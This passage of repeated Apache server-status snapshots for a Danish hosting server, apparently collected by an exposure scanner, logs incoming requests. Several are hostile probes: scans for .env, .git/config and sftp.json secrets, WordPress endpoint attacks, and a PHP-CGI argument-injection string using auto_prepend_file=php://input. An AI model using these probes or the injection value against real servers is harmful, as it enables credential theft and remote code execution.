HTTP/1.0 38-1-0/0/115. 0.0164500.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-1-0/0/115. 0.0164500.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-1-0/0/65. 0.0264500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-1-0/0/65. 0.0164500.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-1-0/0/65. 0.0164500.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-0-0/0/50. 0.05458000.00.000.01 193.176.211.32webhotel5.webhosting.dkGET /blog/wp-content/plugins/WordPressCore/ HTTP/1.0 44-0-0/0/50. 0.05458000.00.000.01 193.176.211.32webhotel5.webhosting.dkGET /wp-includes/certificates/ HTTP/1.0 45-0-0/0/50. 0.06458000.00.000.01 193.176.211.32webhotel5.webhosting.dkGET /images/uploads/ HTTP/1.0 46-0-0/0/50. 0.06457900.00.000.01 193.176.211.32webhotel5.webhosting.dkGET /wp-content/uploads/wp-content/uploads/ HTTP/1.0 47-0-0/0/50. 0.05458000.00.000.02 52.230.152.48webhotel5.webhosting.dk=grakom&publicationName=arr2017&issueName=Issue_091117 HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde34cef1555
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 27-Jun-2024 00:07:06 CEST Restart Time: Wednesday, 26-Jun-2024 06:05:04 CEST Parent Server Generation: 18 Server uptime: 18 hours 2 minutes 1 second Total accesses: 65740 - Total Traffic: 49.0 MB CPU Usage: u.87 s.34 cu0 cs0 - .00186% CPU load 1.01 requests/sec - 791 B/second - 781 B/request 1 requests currently being processed, 29 idle workers ________W_______________...______............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-18604520/7/2017_ 0.01800.00.001.05 139.162.141.82webhotel5.webhosting.dkGET /config.json HTTP/1.0 1-18604430/10/2034_ 0.01900.00.021.11 139.162.141.82webhotel5.webhosting.dkGET /about HTTP/1.0 2-18604500/7/2028_ 0.01800.00.001.69 139.162.141.82webhotel5.webhosting.dkGET /.git/config HTTP/1.0 3-18604560/7/1978_ 0.01310.00.030.96 146.190.63.48webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 4-18604530/7/1999_ 0.01800.00.001.45 139.162.141.82webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 5-18604570/7/2014_ 0.00200.00.001.78 146.190.63.48webhotel5.webhosting.dkGET /server HTTP/1.0 6-18604440/7/1991_ 0.01340.00.002.96 146.190.63.48webhotel5.webhosting.dkGET / HTTP/1.0 7-18604610/7/1967_ 0.00000.00.001.27 146.190.63.48webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 8-18604970/6/1903W 0.00000.00.000.93 146.190.63.48webhotel5.webhosting.dkGET /server-status HTTP/1.0 9-18604590/7/1855_ 0.01100.00.001.31 146.190.63.48webhotel5.webhosting.dkGET /about HTTP/1.0 10-18605280/6/1838_ 0.011040.00.001.09 139.162.141.82webhotel5.webhosting.dkGET / HTTP/1.0 11-18604450/7/1817_ 0.008400.00.000.98 139.162.141.82webhotel5.webhosting.dkGET /server-status HTTP/1.0 12-18604470/7/1891_ 0.00800.00.001.10 139.162.141.82webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 13-18604580/7/1927_ 0.00200.00.001.82 146.190.63.48webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 14-18604600/7/1886_ 0.01100.00.010.98 146.190.63.48webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 15-18605480/6/1888_ 0.011000.00.001.04 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-18605740/6/1902_ 0.02960.00.002.29 139.162.141.82webhotel5.webhosting.dkGET / HTTP/1.0 17-18604620/7/1928_ 0.01000.00.001.06 146.190.63.48webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 18-18606010/6/1929_ 0.00900.00.001.17 139.162.141.82webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 19-18606200/6/1877_ 0.00900.00.001.24 139.162.141.82webhotel5.webhosting.dkGET /server HTTP/1.0 20-18606370/6/1905_ 0.00900.00.001.30 139.162.141.82webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 21-18606420/6/1618_ 0.00900.00.001.47 139.162.141.82webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 22-18606440/6/1648_ 0.01900.00.000.90 139.162.141.82webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 23-18606450/6/1733_ 0.00900.00.001.37 139.162.141.82webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 24-17-0/0/1689. 0.0142000.00.001.14 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 25-17-0/0/1624. 0.09238500.00.001.96 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-17-0/0/1577. 0.081640450.00.002.30 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 27-18604460/7/1473_ 0.01800.00.000.94 139.162.141.82webhotel5.webhosting.dkGET /login.action HTTP/1.0 28-18604480/7/1480_ 0.01810.00.001.96 139.162.141.82webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 29-18604490/7/1600_ 0.00800.00.001.36 139.162.141.82webhotel5.webhosting.dkGET /.env HTTP/1.0 30-18604510/7/1546_ 0.01800.00.000.77 139.162.141.82webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 31-18604540/7/1395_ 0.00740.00.000.70 139.162.141.82webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 32-18604550/7/1304_ 0.01440.00.001.03 146.190.63.48webhotel5.webhosting.dkGET / HTTP/1.0 33-16-0/0/1143. 0.03402000.00.000.67 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-17-0/0/1092. 0.08245000.00.001.05 31.13.127.21webhotel5.webhosting.dkGET /vejvisere/haderslev.html HTTP/1.0 35-16-0/0/765. 0.04402000.00.000.39 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-16-0/0/702. 0.03402000.00.000.96 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-15-0/0/516. 0.02761900.00.000.16 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-15-0/0/362. 0.01761900.00.000.22 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-13-0/0/296. 0.051481700.00.000.18 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-13-0/0/246. 0.071481700.00.000.12 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-13-0/0/172. 0.061481700.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-13-0/0/172. 0.051481700.00.000.13 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-13-0/0/172. 0.081481700.00.000.14 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-13-0/0/172. 0.041481700.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-13-0/0/172. 0.071481700.00.000.11 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-13-0/0/172. 0.051481700.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-13-0/0/141. 0.051481700.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 48-13-0/0/91. 0.051481700.00.000.07 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 49-13-0/0/93. 0.071481700.00.000.08 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde353202845
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 24-Jun-2024 21:34:34 CEST Restart Time: Monday, 24-Jun-2024 16:05:04 CEST Parent Server Generation: 5 Server uptime: 5 hours 29 minutes 30 seconds Total accesses: 17151 - Total Traffic: 10.5 MB CPU Usage: u.65 s.29 cu0 cs0 - .00475% CPU load .868 requests/sec - 555 B/second - 640 B/request 1 requests currently being processed, 30 idle workers _________W___________...._._..________.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-5281840/2/523_ 0.00000.00.000.19 206.81.24.227webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 1-5280720/2/526_ 0.00600.00.000.36 20.41.22.87webhotel5.webhosting.dkGET /extensions/.env HTTP/1.0 2-5282160/1/525_ 0.00940.00.000.41 20.41.22.87webhotel5.webhosting.dkGET /downloads/.env HTTP/1.0 3-5282180/1/526_ 0.00810.00.000.46 81.19.232.105webhotel5.webhosting.dkGET /wp-content/plugins/WordPressCore/include.php HTTP/1.0 4-5282280/1/524_ 0.00710.00.000.22 20.41.22.87webhotel5.webhosting.dkGET /etc/.env HTTP/1.0 5-5279120/2/526_ 0.001300.00.000.29 46.103.82.27webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 6-5280760/2/526_ 0.01300.00.000.22 20.41.22.87webhotel5.webhosting.dkGET /functions/.env HTTP/1.0 7-5280770/2/526_ 0.00000.00.000.23 206.81.24.227webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 8-5280780/2/525_ 0.00000.00.000.23 206.81.24.227webhotel5.webhosting.dkGET /about HTTP/1.0 9-5281860/1/524W 0.00000.00.000.34 206.81.24.227webhotel5.webhosting.dkGET /server-status HTTP/1.0 10-5281870/1/523_ 0.001300.00.000.28 20.41.22.87webhotel5.webhosting.dkGET /dev/.env HTTP/1.0 11-5282290/1/523_ 0.00700.00.000.30 20.41.22.87webhotel5.webhosting.dkGET /extension/.env HTTP/1.0 12-5282550/0/523_ 0.071000.00.000.22 20.41.22.87webhotel5.webhosting.dkGET /cron/.env HTTP/1.0 13-5282300/1/523_ 0.00500.00.000.18 20.41.22.87webhotel5.webhosting.dkGET /files/.env HTTP/1.0 14-5282310/1/523_ 0.00410.00.000.20 20.41.22.87webhotel5.webhosting.dkGET /framework/.env HTTP/1.0 15-5282320/1/522_ 0.004100.00.000.17 63.143.42.253webhotel5.webhosting.dkHEAD / HTTP/1.0 16-5282340/1/520_ 0.00200.00.000.90 20.41.22.87webhotel5.webhosting.dkGET /home/.env HTTP/1.0 17-5282330/1/522_ 0.00400.00.000.23 20.41.22.87webhotel5.webhosting.dkGET /function/.env HTTP/1.0 18-5282350/1/520_ 0.00110.00.000.22 20.41.22.87webhotel5.webhosting.dkGET /htdocs/.env HTTP/1.0 19-5282570/0/519_ 0.08880.00.000.39 172.71.147.76webhotel5.webhosting.dkGET / HTTP/1.0 20-5282950/0/517_ 0.08100.00.000.86 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-5-0/0/513. 0.071300.00.001.20 20.41.22.87webhotel5.webhosting.dkGET /development/.env HTTP/1.0 22-5-0/0/511. 0.0912450.00.000.16 37.113.245.184webhotel5.webhosting.dkGET / HTTP/1.0 23-5-0/0/503. 0.071000.00.000.15 194.36.174.90webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 24-5-0/0/498. 0.081090.00.000.26 198.235.24.18webhotel5.webhosting.dkGET / HTTP/1.0 25-5282360/1/474_ 0.00100.00.000.19 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-5-0/0/470. 0.071000.00.000.16 20.41.22.87webhotel5.webhosting.dkGET /docs/.env HTTP/1.0 27-5282370/1/471_ 0.00110.00.000.22 20.41.22.87webhotel5.webhosting.dkGET /html/.env HTTP/1.0 28-5-0/0/452. 0.081000.00.000.14 194.163.145.202webhotel5.webhosting.dkGET /wp-content/plugins/include.php HTTP/1.0 29-5-0/0/426. 0.07800.00.000.26 20.41.22.87webhotel5.webhosting.dkGET /en/.env HTTP/1.0 30-5166230/49/414_ 0.081200.00.010.14 20.41.22.87webhotel5.webhosting.dkGET /doc/.env HTTP/1.0 31-5212720/21/336_ 0.04000.00.000.09 206.81.24.227webhotel5.webhosting.dkGET /server HTTP/1.0 32-5212730/21/311_ 0.03000.00.010.10 206.81.24.227webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 33-5212740/21/266_ 0.02000.00.000.34 206.81.24.227webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 34-5282380/1/213_ 0.00050.00.000.07 206.81.24.227webhotel5.webhosting.dkGET / HTTP/1.0 35-5282390/1/59_ 0.00030.00.000.03 206.81.24.227webhotel5.webhosting.dkGET / HTTP/1.0 36-5282400/1/87_ 0.00000.00.000.02 206.81.24.227webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 37-5282410/1/81_ 0.00000.00.000.02 20.41.22.87webhotel5.webhosting.dkGET /httpd/.env HTTP/1.0 38-4-0/0/80. 0.00206600.00.000.02 172.71.250.53webhotel5.webhosting.dkGET /server HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3649f13f4
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 23-Jun-2024 02:58:45 CEST Restart Time: Saturday, 22-Jun-2024 04:00:06 CEST Parent Server Generation: 22 Server uptime: 22 hours 58 minutes 39 seconds Total accesses: 70591 - Total Traffic: 69.9 MB CPU Usage: u1.06 s.37 cu0 cs0 - .00173% CPU load .853 requests/sec - 885 B/second - 1037 B/request 1 requests currently being processed, 31 idle workers __________________________W__..___.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-22517250/22/2131_ 0.06200.00.011.31 206.81.24.74webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 1-22513890/22/2132_ 0.032610.00.012.73 159.223.54.10webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 2-22517590/22/2136_ 0.03200.00.001.15 206.81.24.74webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 3-22518710/22/2122_ 0.02100.00.061.23 159.89.127.165webhotel5.webhosting.dkGET /about HTTP/1.0 4-22517920/22/2131_ 0.03100.00.016.42 206.81.24.74webhotel5.webhosting.dkGET /about HTTP/1.0 5-22516410/22/2127_ 0.03260.00.011.93 206.81.24.74webhotel5.webhosting.dkGET / HTTP/1.0 6-22512600/23/2124_ 0.03000.00.012.12 206.81.24.74webhotel5.webhosting.dkGET /.git/config HTTP/1.0 7-22516670/22/2125_ 0.03220.00.001.33 159.89.127.165webhotel5.webhosting.dkGET / HTTP/1.0 8-22513190/23/2116_ 0.04000.00.014.92 206.81.24.74webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 9-22516680/22/2122_ 0.05200.00.091.66 206.81.24.74webhotel5.webhosting.dkGET /server HTTP/1.0 10-22517600/22/2121_ 0.04100.00.011.93 159.89.127.165webhotel5.webhosting.dkGET /server HTTP/1.0 11-22517930/22/2068_ 0.05100.00.011.40 159.89.127.165webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 12-22517940/22/2106_ 0.03100.00.006.79 206.81.24.74webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 13-22517950/22/2115_ 0.04100.00.011.65 206.81.24.74webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 14-22519010/22/2113_ 0.02100.00.012.12 206.81.24.74webhotel5.webhosting.dkGET /login.action HTTP/1.0 15-22519020/22/2109_ 0.03100.00.013.12 206.81.24.74webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 16-22519250/22/2109_ 0.04100.00.012.00 159.89.127.165webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 17-22519260/22/2086_ 0.03000.00.022.11 206.81.24.74webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 18-22519270/22/1981_ 0.03000.00.011.56 159.89.127.165webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 19-22539180/21/2028_ 0.03100.00.012.68 206.81.24.74webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 20-22519280/22/1994_ 0.04000.00.011.86 206.81.24.74webhotel5.webhosting.dkGET /.env HTTP/1.0 21-22551400/18/1871_ 0.03200.00.011.78 159.89.127.165webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 22-22541370/21/1863_ 0.031280.00.011.62 206.81.24.74webhotel5.webhosting.dkGET /server-status HTTP/1.0 23-22543660/21/1826_ 0.04000.00.011.14 159.89.127.165webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 24-22548250/21/1811_ 0.04000.00.011.43 206.81.24.74webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 25-22571420/12/1853_ 0.01000.00.001.05 206.81.24.74webhotel5.webhosting.dkGET /config.json HTTP/1.0 26-22513510/22/1825W 0.03000.00.011.65 159.89.127.165webhotel5.webhosting.dkGET /server-status HTTP/1.0 27-22513520/22/1777_ 0.032000.00.010.99 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 28-22513900/22/1770_ 0.031430.00.011.01 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 29-22-0/0/1622. 0.061608200.00.000.76 110.249.202.135www.valloe.orgGET /music/mst0407.htm HTTP/1.0 30-22-0/0/1586. 0.06160400.00.001.48 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-22513910/22/1630_ 0.03510.00.041.09 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 32-22513920/22/1504_ 0.04460.00.011.14 206.81.24.74webhotel5.webhosting.dkGET / HTTP/1.0 33-22422550/40/1350_ 0.06260.00.020.85 159.89.127.165webhotel5.webhosting.dkGET / HTTP/1.0 34-21-0/0/1019. 0.03352000.00.000.51 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-21-0/0/820. 0.05352000.00.000.37 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-21-0/0/662. 0.04352000.00.000.26 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-21-0/0/492. 0.03352000.00.000.25 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-17-0/0/369. 0.001791800.00.000.14 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-17-0/0/244. 0.011791800.00.000.08 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-17-0/0/147. 0.011791800.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-17-0/0/146. 0.001791800.00.000.05 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-17-0/0/97. 0.011791800.00.000.07 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-17-0/0/97. 0.011791800.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-17-0/0/96. 0.001791800.00.000.03 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-11-0/0/18. 0.023951900.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3267b0aef
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 21-Jun-2024 02:15:48 CEST Restart Time: Thursday, 20-Jun-2024 16:05:04 CEST Parent Server Generation: 10 Server uptime: 10 hours 10 minutes 44 seconds Total accesses: 33255 - Total Traffic: 19.5 MB CPU Usage: u1.24 s.56 cu0 cs0 - .00491% CPU load .908 requests/sec - 557 B/second - 614 B/request 1 requests currently being processed, 32 idle workers ___________________________W_____............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1095460/19/979_ 0.045700.00.010.45 38.253.88.246webhotel5.webhosting.dkPOST /xmlrpc.php HTTP/1.0 1-1095440/21/984_ 0.04110.00.010.45 146.190.63.48webhotel5.webhosting.dkGET /about HTTP/1.0 2-1095410/21/986_ 0.05430.00.011.26 146.190.63.48webhotel5.webhosting.dkGET / HTTP/1.0 3-1095470/20/982_ 0.0334120.00.010.40 193.124.191.92www.psykologaarhus.dkHEAD / HTTP/1.0 4-1095480/20/977_ 0.033200.00.030.50 159.138.111.108webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 5-1095490/20/978_ 0.032637560.00.020.61 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-1095600/20/979_ 0.031210.00.010.46 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 7-1095500/20/981_ 0.043220.00.010.41 5.188.62.76webhotel5.webhosting.dkGET / HTTP/1.0 8-1095510/20/978_ 0.032626720.00.010.45 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-1095450/20/978_ 0.02000.00.010.49 146.190.63.48webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 10-1095520/20/975_ 0.042130.00.010.43 24.199.115.79webhotel5.webhosting.dkGET / HTTP/1.0 11-1095530/20/974_ 0.0222130.00.010.83 3.212.128.62webhotel5.webhosting.dkHEAD / HTTP/1.0 12-1095540/20/971_ 0.03264170.00.010.42 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-1095610/20/974_ 0.031100.00.010.48 81.19.232.105webhotel5.webhosting.dkGET /.git/config HTTP/1.0 14-1095550/20/927_ 0.042600.00.010.42 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-1095420/21/924_ 0.02360.00.010.38 146.190.63.48webhotel5.webhosting.dkGET / HTTP/1.0 16-1095560/21/919_ 0.031900.00.020.47 185.211.59.11webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 17-1095570/20/940_ 0.042030.00.010.57 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 18-1095580/19/916_ 0.0415440.00.010.40 43.135.149.154webhotel5.webhosting.dkGET / HTTP/1.0 19-1095590/19/912_ 0.032000.00.010.51 98.97.56.165webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 20-1095680/20/918_ 0.02600.00.010.53 172.56.241.5webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 21-1095710/20/918_ 0.04300.00.010.40 146.190.63.48webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 22-1095730/20/900_ 0.04200.00.010.64 146.190.63.48webhotel5.webhosting.dkGET /server HTTP/1.0 23-1095750/20/906_ 0.03200.00.010.56 146.190.63.48webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 24-1095770/20/896_ 0.03200.00.010.52 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-1095790/20/897_ 0.02170.00.011.53 146.190.63.48webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 26-1095830/21/860_ 0.020290.00.010.44 81.19.232.105www.valloe.orgGET /blues/dcb02.htm HTTP/1.0 27-1096090/19/857W 0.04000.00.010.69 146.190.63.48webhotel5.webhosting.dkGET /server-status HTTP/1.0 28-1096110/20/846_ 0.045400.00.020.49 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-10106810/16/864_ 0.035500.00.020.39 111.229.202.31webhotel5.webhosting.dkPOST /xmlrpc.php HTTP/1.0 30-1095430/21/775_ 0.03000.00.030.51 146.190.63.48webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 31-10107590/16/651_ 0.032628350.00.010.38 63.143.42.253webhotel5.webhosting.dkHEAD / HTTP/1.0 32-10139900/0/653_ 0.032600.00.000.27 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 33-9-0/0/578. 0.0394300.00.000.42 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-9-0/0/588. 0.0394300.00.000.29 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-8-0/0/361. 0.02454300.00.000.13 157.245.109.76webhotel5.webhosting.dkw_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 36-8-0/0/393. 0.01454300.00.000.15 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-8-0/0/295. 0.08533500.00.000.15 114.119.146.197webhotel5.webhosting.dkimages/thumbs/films/19831/350x233_thumb-Scene4-004.jpg HTTP/1.0 38-8-0/0/164. 0.07532100.00.000.20 66.249.79.235webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 39-8-0/0/151. 0.08532100.00.000.05 81.170.148.229webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 40-8-0/0/100. 0.06532000.00.000.07 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-8-0/0/100. 0.07532000.00.000.08 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 42-8-0/0/100. 0.08532000.00.000.05 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 43-8-0/0/100. 0.065320600.00.000.06 